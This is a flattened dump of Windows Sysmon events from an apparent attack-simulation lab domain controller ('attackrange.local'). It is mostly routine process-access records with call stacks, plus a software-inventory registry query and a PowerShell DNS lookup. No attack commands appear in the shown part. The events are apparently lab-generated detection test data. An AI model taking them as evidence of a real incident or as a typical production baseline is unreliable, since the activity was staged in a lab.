15:52:01.810{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003037Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:01.810{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003036Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:01.810{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003035Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:01.810{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003034Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:01.810{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7CA1-5FA1-8F00-000000008801}2312C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003033Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:01.810{D28789B6-7CA1-5FA1-8D00-000000008801}43484380C:\Windows\system32\cmd.exe{D28789B6-7CA1-5FA1-8F00-000000008801}2312C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\msvcrt.dll+4ba7c|C:\Windows\system32\cmd.exe+103c4|C:\Windows\system32\cmd.exe+10910|C:\Windows\system32\cmd.exe+c36d|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003032Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:01.816{D28789B6-7CA1-5FA1-8F00-000000008801}2312C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c C:\Windows\system32\reg.exe query hklm\software\microsoft\windows\softwareinventorylogging /v collectionstate /reg:64C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7CA1-5FA1-8D00-000000008801}4348C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /d /c C:\Windows\system32\silcollector.cmd configure 10341000x80000000000000003031Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:01.465{D28789B6-7CA1-5FA1-8E00-000000008801}27644356C:\Windows\system32\conhost.exe{D28789B6-7CA1-5FA1-8D00-000000008801}4348C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003030Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:01.465{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7CA1-5FA1-8E00-000000008801}2764C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003029Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:01.465{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003028Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:01.465{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003027Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:01.465{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003026Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:01.465{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003025Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:01.465{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003024Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:01.465{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003023Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:01.465{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003022Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:01.465{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003021Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:01.465{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003020Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:01.465{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7CA1-5FA1-8D00-000000008801}4348C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003019Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:01.465{D28789B6-7C64-5FA1-1000-000000008801}11442104C:\Windows\system32\svchost.exe{D28789B6-7CA1-5FA1-8D00-000000008801}4348C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a711|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+d305|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e014|c:\windows\system32\UBPM.dll+115a2|c:\windows\system32\EventAggregation.dll+3fae|c:\windows\system32\EventAggregation.dll+3ea1|c:\windows\system32\EventAggregation.dll+36c9|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b65|C:\Windows\SYSTEM32\ntdll.dll+6586d|C:\Windows\SYSTEM32\ntdll.dll+656d0|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003018Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:01.465{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003017Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:01.465{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003058Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:04.707{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C9E-5FA1-8900-000000008801}5004C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1fb7a|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+178ce|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x80000000000000003059Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:04.716{D28789B6-7C9E-5FA1-8900-000000008801}5004win-dc-807.attackrange.local0fe80::4d6c:cfdc:29be:620c;::ffff:10.0.1.14;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x80000000000000003156Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.495{D28789B6-7CA7-5FA1-9200-000000008801}5048668C:\Windows\system32\conhost.exe{D28789B6-7CA7-5FA1-9600-000000008801}4372C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003155Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.495{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003154Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.495{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003153Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.495{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003152Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 